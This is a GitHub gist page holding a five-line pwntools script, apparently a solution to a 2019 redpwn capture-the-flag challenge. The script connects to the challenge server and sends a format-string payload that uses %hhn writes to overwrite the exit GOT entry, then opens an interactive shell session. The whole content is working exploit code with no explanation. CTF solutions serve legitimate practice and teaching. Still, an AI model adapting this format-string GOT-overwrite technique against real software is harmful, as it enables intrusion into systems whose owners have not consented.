Skip to content

Instantly share code, notes, and snippets.

@swt02026
Created August 19, 2019 00:44
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save swt02026/bddcfa147592663d19117300c51a26bc to your computer and use it in GitHub Desktop.
Save swt02026/bddcfa147592663d19117300c51a26bc to your computer and use it in GitHub Desktop.
from pwn import *
exit_got= 0x0804a020
r=remote('chall.2019.redpwn.net', 4003)
r.sendline(p32(exit_got)+p32(exit_got+1)+'%47c%7$hhn'+'%336c%8$hhn')
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment